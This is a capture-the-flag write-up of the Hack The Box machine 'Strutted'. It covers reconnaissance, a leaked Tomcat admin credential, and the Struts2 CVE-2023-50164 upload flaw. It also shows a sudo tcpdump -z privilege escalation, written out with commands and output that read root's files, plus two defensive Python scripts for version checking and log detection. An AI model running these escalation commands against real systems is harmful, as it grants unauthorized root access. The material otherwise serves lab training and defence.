HTB Strutted

Target IP:

10.10.11.59

nmap scan results

```
┌──(kali㉿Hack3rr)-[~]
└─$ nmap -A -Pn -sC -sV 10.10.11.59
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-11 23:43 CST
Nmap scan report for 10.10.11.59
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 142.60 ms 10.10.16.1
2 100.45 ms 10.10.11.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.88 seconds
```

Web information

```
┌──(kali㉿Hack3rr)-[~]
└─$ whatweb 'http://strutted.htb/'
http://strutted.htb/ [200 OK] Bootstrap, Content-Language[en-US], Cookies[JSESSIONID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], HttpOnly[JSESSIONID], IP[10.10.11.59], Java, Script, Title[Strutted™ - Instant Image Uploads], UncommonHeaders[cross-origin-embedder-policy-report-only,cross-origin-opener-policy], nginx[1.18.0]
```

Directory enumeration

```
[23:45:57] Starting:
[23:46:09] 400 - 2KB - /\..\..\..\..\..\..\..\..\..\etc\passwd
[23:46:10] 400 - 2KB - /a%5c.aspx
[23:46:11] 200 - 6KB - /about
[23:46:39] 200 - 38MB - /download
[23:47:08] 200 - 4KB - /s/sfsites/aura
```

/download.action serves the application's source code. Dumping it and looking through it shows the app is built on Struts2, one of the all-time vulnerability kings of the Java world!

Credentials (a tomcat-users.xml sitting in the dumped source):

```
<?xml version='1.0' encoding='utf-8'?>

<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="skqKY6360z!Y" roles="manager-gui,admin-gui"/>
</tomcat-users>
```

The Struts2 here is affected by CVE-2023-50164 (Apache advisory S2-066): manipulating the file-upload parameters lets an attacker traverse directories with the uploaded filename, so a malicious file such as a JSP can be written somewhere the server will execute it, which gives RCE. Affected versions are 2.0.0 to 2.3.37, 2.5.0 to 2.5.32 and 6.0.0 to 6.3.0.1; the fix shipped in 2.5.33 and 6.3.0.2.

I'll go back and debug this hole properly later~
For now I just hit it with a PoC.

407cebe31d35183bac1bd3e99ec5b681
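A check worth doing on a source dump like this one before spending time on a PoC: confirm that the struts2-core version actually falls inside the CVE-2023-50164 (S2-066) affected ranges. The script below is an added example for this writeup, not code from the box or from Apache Struts. The pom.xml and jar path it parses are constructed sample inputs, not the target's real files; the affected ranges are those from the Apache advisory (2.0.0 to 2.3.37, 2.5.0 to 2.5.32, 6.0.0 to 6.3.0.1; fixed in 2.5.33 and 6.3.0.2), and it resolves a `${...}` Maven property because that is how most Struts projects declare the version.

```python
"""Confirm a dumped Struts2 app's version falls in the CVE-2023-50164 (S2-066) ranges.

Added example for this writeup, not code from the box or from Apache Struts.
Affected per the Apache advisory: 2.0.0-2.3.37, 2.5.0-2.5.32, 6.0.0-6.3.0.1.
Fixed in 2.5.33 and 6.3.0.2.
"""
import re
from typing import Optional, Tuple

AFFECTED_RANGES = (
    ((2, 0, 0), (2, 3, 37)),
    ((2, 5, 0), (2, 5, 32)),
    ((6, 0, 0), (6, 3, 0, 1)),
)

# Constructed sample pom.xml (not the target's). It declares the version through a
# Maven property, so the checker has to resolve ${...} before comparing.
SAMPLE_POM = """<project>
  <properties>
    <struts2.version>6.3.0.1</struts2.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>${struts2.version}</version>
    </dependency>
  </dependencies>
</project>"""


def parse_version(v: str) -> Tuple[int, ...]:
    """'6.3.0.1' -> (6, 3, 0, 1). A '-SNAPSHOT' / '-RC1' suffix is ignored."""
    parts = v.split("-", 1)[0].split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable Struts version: {v!r}")
    return tuple(int(p) for p in parts)


def _pad(t: Tuple[int, ...], width: int = 4) -> Tuple[int, ...]:
    """Right-pad with zeros so 6.3.0 and 6.3.0.1 compare sensibly."""
    return tuple(t) + (0,) * (width - len(t))


def is_affected_by_cve_2023_50164(version: str) -> bool:
    """True if `version` lies inside one of the advisory's affected ranges."""
    v = _pad(parse_version(version))
    return any(_pad(lo) <= v <= _pad(hi) for lo, hi in AFFECTED_RANGES)


def _resolve_property(pom_xml: str, value: str) -> str:
    """Replace a ${prop} reference with the matching <properties> entry, if present."""
    m = re.fullmatch(r"\$\{([\w.\-]+)\}", value)
    if not m:
        return value
    name = re.escape(m.group(1))
    prop = re.search(rf"<{name}>\s*([^<\s]+)\s*</{name}>", pom_xml)
    return prop.group(1) if prop else value


def struts_version_from_pom(pom_xml: str) -> Optional[str]:
    """Version of the struts2-core dependency, or None if absent or managed elsewhere."""
    for block in re.findall(r"<dependency>(.*?)</dependency>", pom_xml, re.S):
        if re.search(r"<artifactId>\s*struts2-core\s*</artifactId>", block):
            m = re.search(r"<version>\s*([^<\s]+)\s*</version>", block)
            return _resolve_property(pom_xml, m.group(1)) if m else None
    return None


def struts_version_from_jar(path: str) -> Optional[str]:
    """Version from a WEB-INF/lib jar name such as struts2-core-2.5.30.jar."""
    m = re.search(r"struts2-core-(\d+(?:\.\d+)+)\.jar$", path)
    return m.group(1) if m else None


if __name__ == "__main__":
    ver = struts_version_from_pom(SAMPLE_POM)
    print(ver, "affected" if is_affected_by_cve_2023_50164(ver) else "not affected")
```

If the dump has no pom.xml (a deployed WAR usually does not), `struts_version_from_jar` on the file names under WEB-INF/lib gives the same answer; the version tuple is zero-padded so that a three-part version such as 6.3.0 compares correctly against the four-part upper bound 6.3.0.1.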

Privilege escalation via sudo -l

```
james@strutted:~$ sudo -l
Matching Defaults entries for james on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User james may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/tcpdump
james@strutted:~$ COMMAND='ls /root&&cat /root/*'
james@strutted:~$ TF=$(mktemp)
james@strutted:~$ echo "$COMMAND" > $TF
james@strutted:~$ chmod +x $TF
james@strutted:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
james@strutted:~$ ls
user.txt
james@strutted:~$ COMMAND='ls /root&&cat /root/* > /tmp/1'
james@strutted:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
root.txt
cb48c2a5f7a41ff6b7bfdb6172307ab1
james@strutted:~$
```

Very easy!!
cb48c2a5f7a41ff6b7bfdb6172307ab1
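The sudo rule above is the whole problem: tcpdump's `-z` hook executes an arbitrary program after every file rotation (`-G 1 -W 1` forces one immediately), and `-Z root` stops it from dropping to the unprivileged service account first, so NOPASSWD tcpdump is effectively NOPASSWD root. This is the standard GTFOBins tcpdump trick, and from the defender's side the exact invocation is easy to pick out of sudo's own log. The script below is an added example for this writeup, not code from the box; the auth.log lines it scans are constructed to look like Ubuntu's sudo entries and are not taken from the target.

```python
"""Flag sudo-run tcpdump invocations that use the -z postrotate hook.

Added example for this writeup, not code from the box. The log lines below are
constructed to mimic Ubuntu's /var/log/auth.log sudo entries.
"""
import re
import shlex
from typing import Dict, List, Optional

# sudo's default log record: "sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+(?:TTY=(?P<tty>\S+)\s+;\s+)?"
    r"PWD=(?P<pwd>\S+)\s+;\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<command>.*)$"
)

# Constructed sample input (not from the target): one abuse, one benign capture,
# one unrelated sudo command, and a pam_unix session line that is not a command record.
SAMPLE_AUTH_LOG = [
    "Mar 11 23:50:01 strutted sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; "
    "COMMAND=/usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/tmp.Kz3a1Q -Z root",
    "Mar 11 23:51:12 strutted sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; "
    "COMMAND=/usr/sbin/tcpdump -i eth0 -c 10 -w /tmp/cap.pcap",
    "Mar 11 23:52:40 strutted sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; "
    "COMMAND=/usr/bin/apt update",
    "Mar 11 23:53:05 strutted sudo: pam_unix(sudo:session): session opened for user root(uid=0) by james(uid=1000)",
]


def parse_sudo_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of a sudo COMMAND record, or None for any other line."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def _opt_value(argv: List[str], i: int, flag: str) -> Optional[str]:
    """getopt-style lookup at position i: '-z script' or '-zscript'. None if not that flag."""
    a = argv[i]
    if a == flag:
        return argv[i + 1] if i + 1 < len(argv) else None
    if a.startswith(flag) and len(a) > len(flag):
        return a[len(flag):]
    return None


def tcpdump_postrotate_abuse(command: str) -> Optional[Dict[str, str]]:
    """If `command` is tcpdump with a -z postrotate program, report what it runs and as whom.

    -z <prog> makes tcpdump exec "<prog> <savefile>" after each rotation (-G/-C/-W).
    -Z <user> sets the account tcpdump drops to before that; -Z root keeps root.
    Bundled short flags such as '-lnz' are not handled; tcpdump accepts them but
    this checker only sees '-z' / '-zVALUE' as separate argv entries.
    """
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "tcpdump":
        return None
    script = drop_user = None
    for i in range(1, len(argv)):
        script = _opt_value(argv, i, "-z") or script
        drop_user = _opt_value(argv, i, "-Z") or drop_user
    if script is None:
        return None
    return {"postrotate": script, "runs_as": drop_user or "tcpdump default drop user"}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run every line through the parser and return the tcpdump -z hits with their fields."""
    hits = []
    for line in lines:
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        abuse = tcpdump_postrotate_abuse(rec["command"])
        if abuse:
            hits.append({**rec, **abuse})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_AUTH_LOG):
        print(f"{h['user']} ran tcpdump as {h['runas']} with postrotate {h['postrotate']} "
              f"(runs as: {h['runs_as']})")
```

Any hit with a `-z` program under /tmp, /dev/shm or a home directory is worth treating as a privilege escalation rather than a capture; the fix on the sudoers side is to stop granting tcpdump at all, since no argument whitelist makes `-z` safe.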